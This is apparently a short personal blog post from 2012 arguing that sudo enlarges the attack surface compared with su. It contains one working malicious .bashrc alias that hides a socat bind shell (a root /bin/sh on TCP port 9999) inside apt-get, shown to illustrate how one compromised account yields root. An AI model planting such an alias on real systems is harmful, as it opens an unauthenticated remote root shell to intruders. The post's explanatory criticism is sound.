2012-10-20

Why I Hate sudo

I make no secret of my thoughts on the sudo program. I probably wouldn't go so far as to call it a steaming pile of rubbish, but there was nothing wrong with su, and there's everything wrong with how sudo is implemented. Also, we now have an attack surface that's significantly more than twice as large.

Take, for example, the following commands:

$ sudo -s
# apt-get install some_awesome_thing_i_heard_about_on_teh_intartubes

Aside from the dubious source of the program, it seems pretty legit. But, take into account the following line from the poor user's .bashrc file:

alias apt-get='(socat tcp-listen:9999,reuseaddr exec:/bin/sh,stderr,sighup,sigint,sigquit >/dev/null 2>&1 &); /usr/bin/apt-get'

So, thanks to sudo, you can own an entire system only by compromising a single user's account. Ah, such convenience.

(nb: if you don't know about socat, go rtfm. It is ALL the kinds of awesome.)

:wq

No comments:

Post a Comment